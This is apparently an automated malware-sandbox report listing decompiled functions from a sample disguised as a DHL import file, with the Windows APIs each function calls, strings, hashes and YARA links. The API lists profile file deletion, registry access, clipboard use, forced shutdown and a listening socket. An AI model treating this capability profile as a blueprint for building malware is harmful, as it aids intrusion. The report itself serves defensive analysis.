Instruction Fuzzy Hash: F361F3342042019FD304EF25D89AF2A7FA4BF94716F14455EF85A972A2CB30DE4DEB62

Function 0055698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 005569BE
FindClose.KERNEL32(00000000), ref: 00556A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00556A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00556A75

Part of subcall function 004E9CB3: _wcslen.LIBCMT ref: 004E9CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00556AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00556ADF

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00556B6A
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00556B32
%02d, xrefs: 00556C00, 00556C0A, 00556C5A, 00556CAA, 00556CFA, 00556D4A
%4d, xrefs: 00556BB1
%03d, xrefs: 00556DA2

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: e0f1f447e07a83c2b66c296e759d538e0b8d45aaac78f2148e89e08ca2221a54
Instruction ID: be3b0df44803d593f2b88985f05c9a29b43bc41a5219fe022229e3649f20d23b
Opcode Fuzzy Hash: e0f1f447e07a83c2b66c296e759d538e0b8d45aaac78f2148e89e08ca2221a54
Instruction Fuzzy Hash: AED15271508340AFC310EBA6D891EABB7ECBF98705F44491EF985C7191EB38DA48C762

Function 00559642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00559663
GetFileAttributesW.KERNEL32(?), ref: 005596A1
SetFileAttributesW.KERNEL32(?,?), ref: 005596BB
FindNextFileW.KERNEL32(00000000,?), ref: 005596D3
FindClose.KERNEL32(00000000), ref: 005596DE
FindFirstFileW.KERNEL32(*.*,?), ref: 005596FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0055974A
SetCurrentDirectoryW.KERNEL32(005A6B7C), ref: 00559768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00559772
FindClose.KERNEL32(00000000), ref: 0055977F
FindClose.KERNEL32(00000000), ref: 0055978F

Strings

*.*, xrefs: 005596F5

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 72a41ddf70f4d2c1d3e942ecfbc0507747ff6ba379755153c8b0e0ab2452e9e9
Instruction ID: b421a2d131539398d4ab7b26644dd45ebc5b454c4d55eb158dda92fe01cc34c1
Opcode Fuzzy Hash: 72a41ddf70f4d2c1d3e942ecfbc0507747ff6ba379755153c8b0e0ab2452e9e9
Instruction Fuzzy Hash: B631F83550121AAEDB109FB4EC18ADE3FACFF4A321F144057F919E2090DB34DD889E10

Function 0055979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 005597BE
FindNextFileW.KERNEL32(00000000,?), ref: 00559819
FindClose.KERNEL32(00000000), ref: 00559824
FindFirstFileW.KERNEL32(*.*,?), ref: 00559840
SetCurrentDirectoryW.KERNEL32(?), ref: 00559890
SetCurrentDirectoryW.KERNEL32(005A6B7C), ref: 005598AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 005598B8
FindClose.KERNEL32(00000000), ref: 005598C5
FindClose.KERNEL32(00000000), ref: 005598D5

Part of subcall function 0054DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0054DB00

Strings

*.*, xrefs: 0055983B

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 70bd05d4ca310504ef254ae0fcfbfd75d5ebf602f2baced2e07431d4d5f158c9
Instruction ID: e579d7139023d7e24b137adcf1ae12c70b801b31ab4fe95693d845a1bb5950f0
Opcode Fuzzy Hash: 70bd05d4ca310504ef254ae0fcfbfd75d5ebf602f2baced2e07431d4d5f158c9
Instruction Fuzzy Hash: BD31E33550021AAADB20AFB4EC58ADE7FACFF46321F14455AE854A21D0DB34DE899B60

Function 0056BE44 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0056C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0056B6AE,?,?), ref: 0056C9B5
Part of subcall function 0056C998: _wcslen.LIBCMT ref: 0056C9F1
Part of subcall function 0056C998: _wcslen.LIBCMT ref: 0056CA68
Part of subcall function 0056C998: _wcslen.LIBCMT ref: 0056CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0056BF3E
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0056BFA9
RegCloseKey.ADVAPI32(00000000), ref: 0056BFCD
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0056C02C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0056C0E7
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0056C154
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0056C1E9
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0056C23A
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0056C2E3
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0056C382
RegCloseKey.ADVAPI32(00000000), ref: 0056C38F

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: 130a9f63a1c3a2ffa60aaf231e55cc242a7ca99c9a6fa4e5b2625ba0a9126379
Instruction ID: 93f4bf3453ac06494d06fc73d7ac46bfc6d87fc35dda0d44dea6b9f228445d7e
Opcode Fuzzy Hash: 130a9f63a1c3a2ffa60aaf231e55cc242a7ca99c9a6fa4e5b2625ba0a9126379
Instruction Fuzzy Hash: AB023C71604240AFD714DF25C895E2ABBE5FF89318F18889DF88ACB2A2D731ED45CB51

Function 00558195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00558257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00558267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00558273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00558310
SetCurrentDirectoryW.KERNEL32(?), ref: 00558324
SetCurrentDirectoryW.KERNEL32(?), ref: 00558356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0055838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00558395

Strings

*.*, xrefs: 0055839B

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: ddc97da33f10b03d8054df91428f2132889d30a29049375791b60e13c082b5ac
Instruction ID: 8d9f765d6d38d0e54d4cbd1a4faf4268ff74f91676a2c82271431c8744b48a4d
Opcode Fuzzy Hash: ddc97da33f10b03d8054df91428f2132889d30a29049375791b60e13c082b5ac
Instruction Fuzzy Hash: E0619A72104345AFC710EF21C8549AEBBE8FF89315F048C1EF98993251DB35E949CB92

Function 0054D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004E3A97,?,?,004E2E7F,?,?,?,00000000), ref: 004E3AC2

Part of subcall function 0054E199: GetFileAttributesW.KERNEL32(?,0054CF95), ref: 0054E19A

FindFirstFileW.KERNEL32(?,?), ref: 0054D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0054D1DD
MoveFileW.KERNEL32(?,?), ref: 0054D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0054D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0054D237

Part of subcall function 0054D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0054D21C,?,?), ref: 0054D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0054D253
FindClose.KERNEL32(00000000), ref: 0054D264

Strings

\*.*, xrefs: 0054D0CD, 0054D0D6, 0054D0EB

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 58e837e5bdea8ba9b81a665d61f5aaee65160a7a2992bc3175bee0c6a24b0d27
Instruction ID: 48718fa2d34a5095061336aa2170308834f3b1ac1403b99426d353a355f21310
Opcode Fuzzy Hash: 58e837e5bdea8ba9b81a665d61f5aaee65160a7a2992bc3175bee0c6a24b0d27
Instruction Fuzzy Hash: 0D61AE31C0514D9BCF05EBE2D9929EDBBB5BF50309F24406AE402731A2EB346F49DB60

Function 0055ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0055ED91
EmptyClipboard.USER32 ref: 0055ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0055EDAC
CloseClipboard.USER32 ref: 0055EEA3

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 57994b67bf316cec30e3d751471f42fa97e1f6cfeeb507f4232886ab150478f6
Instruction ID: 9bf75606c3e5bca65d27f6a0fa68d1f457688e0a93deffcd4befa7b2dfd651dc
Opcode Fuzzy Hash: 57994b67bf316cec30e3d751471f42fa97e1f6cfeeb507f4232886ab150478f6
Instruction Fuzzy Hash: 8541E134204611AFD714CF15E89AB19BFE4FF44319F04C49EE8598BAA2C735ED85DB80

Function 0054E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 005416C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0054170D
Part of subcall function 005416C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0054173A
Part of subcall function 005416C3: GetLastError.KERNEL32 ref: 0054174A

ExitWindowsEx.USER32(?,00000000), ref: 0054E932

Strings

@, xrefs: 0054E925
SeShutdownPrivilege, xrefs: 0054E902
, xrefs: 0054E920
, xrefs: 0054E95C

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 9ac2aeddda8d38b6d7944b91fec67f001a4435b50a68d12924b1b5abb7984672
Instruction ID: 86023f8409589eba8891b12aeda4b3a9b1df172e06998fe0928dc6965b25ae42
Opcode Fuzzy Hash: 9ac2aeddda8d38b6d7944b91fec67f001a4435b50a68d12924b1b5abb7984672
Instruction Fuzzy Hash: 4201D673610211ABEB6466B4AC8BFFF7EACB714758F150825F803E31D2D6A15C849294

Function 00561204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00561276
WSAGetLastError.WSOCK32 ref: 00561283
bind.WSOCK32(00000000,?,00000010), ref: 005612BA
WSAGetLastError.WSOCK32 ref: 005612C5
closesocket.WSOCK32(00000000), ref: 005612F4
listen.WSOCK32(00000000,00000005), ref: 00561303
WSAGetLastError.WSOCK32 ref: 0056130D
closesocket.WSOCK32(00000000), ref: 0056133C

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: a13a5bdf5e5d460d4f80853b8dc4ea88e5857869f287a2fdfa65f21ec0c3cff4
Instruction ID: cc62047e878fc312153cb56702d407fdd3dcee6074ccb7dcec64e45edb9fe7a2
Opcode Fuzzy Hash: a13a5bdf5e5d460d4f80853b8dc4ea88e5857869f287a2fdfa65f21ec0c3cff4
Instruction Fuzzy Hash: 6D418E35A005409FD710DF25D498B2ABBE6BF46318F1C858CE8568F296C771EC85DBE1

Function 0054D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004E3A97,?,?,004E2E7F,?,?,?,00000000), ref: 004E3AC2

Part of subcall function 0054E199: GetFileAttributesW.KERNEL32(?,0054CF95), ref: 0054E19A

FindFirstFileW.KERNEL32(?,?), ref: 0054D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0054D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0054D481
FindClose.KERNEL32(00000000), ref: 0054D498
FindClose.KERNEL32(00000000), ref: 0054D4A1

Strings

\*.*, xrefs: 0054D3F2

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 7f6873590d8588aec12e5803d749851641917323ae293e8ec23ede7d40852de8
Instruction ID: f1913ea216eea62d1610845e5ee892fce064948a485547141d5c56c3bb107e08
Opcode Fuzzy Hash: 7f6873590d8588aec12e5803d749851641917323ae293e8ec23ede7d40852de8
Instruction Fuzzy Hash: DC3190710083819BC701EF61D8558AF7BA8BFA1309F444E1EF4D553191EB34AA49D767

Function 0051E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0051E645

Strings

1#SNAN, xrefs: 0051F844
1#QNAN, xrefs: 0051F84B
1#IND, xrefs: 0051F83D
1#INF, xrefs: 0051F852

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: baf53fa3b6461f5255589cf0044de35a6de4bb997bf9f30dbe12e5454b7bd4fb
Instruction ID: a1de971c91c34322bcb666a77a7d3a6efc1695fb9c2f0a71427e55042d26a34b
Opcode Fuzzy Hash: baf53fa3b6461f5255589cf0044de35a6de4bb997bf9f30dbe12e5454b7bd4fb
Instruction Fuzzy Hash: FEC23B71E046298FEB25CE289D457EABBB5FB49304F1445EAD80DE7281E774AEC18F40

Function 0055648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 005564DC
CoInitialize.OLE32(00000000), ref: 00556639
CoCreateInstance.OLE32(0057FCF8,00000000,00000001,0057FB68,?), ref: 00556650
CoUninitialize.OLE32 ref: 005568D4

Strings

.lnk, xrefs: 005564BA, 00556524, 005565E0

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 810daccc4201846653556b04240ac2e70fc88824425ff307b0ecb8fa218b72bb
Instruction ID: 67be99c134fd9b6849759b5c559b358d7440c86bb6d4ab9d1b447d84038cc13a
Opcode Fuzzy Hash: 810daccc4201846653556b04240ac2e70fc88824425ff307b0ecb8fa218b72bb
Instruction Fuzzy Hash: 45D16B715083419FC314EF25C89196BBBE8FF94709F50496EF5958B2A1EB30EE09CB92

Function 005622DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 005622E8

Part of subcall function 0055E4EC: GetWindowRect.USER32(?,?), ref: 0055E504

GetDesktopWindow.USER32 ref: 00562312
GetWindowRect.USER32(00000000), ref: 00562319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00562355
GetCursorPos.USER32(?), ref: 00562381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 005623DF

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 4e4727e5fe4ad18a33c51e7fc2a0e4baaa53e5e5000fe728bba31ed4360996ae
Instruction ID: 0e76c2253807d88c3c82ce3b98ff9522974a4ea8984b12757a85356dd1a45425
Opcode Fuzzy Hash: 4e4727e5fe4ad18a33c51e7fc2a0e4baaa53e5e5000fe728bba31ed4360996ae
Instruction Fuzzy Hash: A131DE72605716AFCB20DF54D849B9BBFA9FF84314F00091DF98997281DB34EA48CB92

Function 00559B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004E9CB3: _wcslen.LIBCMT ref: 004E9CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00559B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00559C8B

Part of subcall function 00553874: GetInputState.USER32 ref: 005538CB
Part of subcall function 00553874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00553966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00559BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00559C75

Strings

*.*, xrefs: 00559B5D

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 98c60533eac62ad2dbf553c060afe7bb39777065300215435e2077109970b8c0
Instruction ID: a55b1caddf1681affe6fc93dcdca508e7b727120d43090c1b659863500e37ad7
Opcode Fuzzy Hash: 98c60533eac62ad2dbf553c060afe7bb39777065300215435e2077109970b8c0
Instruction Fuzzy Hash: ED41807190424ADFDF14DF65C859AEEBFB8FF05312F24405AE809A2191EB349E88DF60

Function 004F997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 004F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 004F9BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 004F9A4E
GetSysColor.USER32(0000000F), ref: 004F9B23
SetBkColor.GDI32(?,00000000), ref: 004F9B36

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 8ba564f1eb8dd3bf7efffc86073b9226c2f38895b647101d377d484d8f925ad6
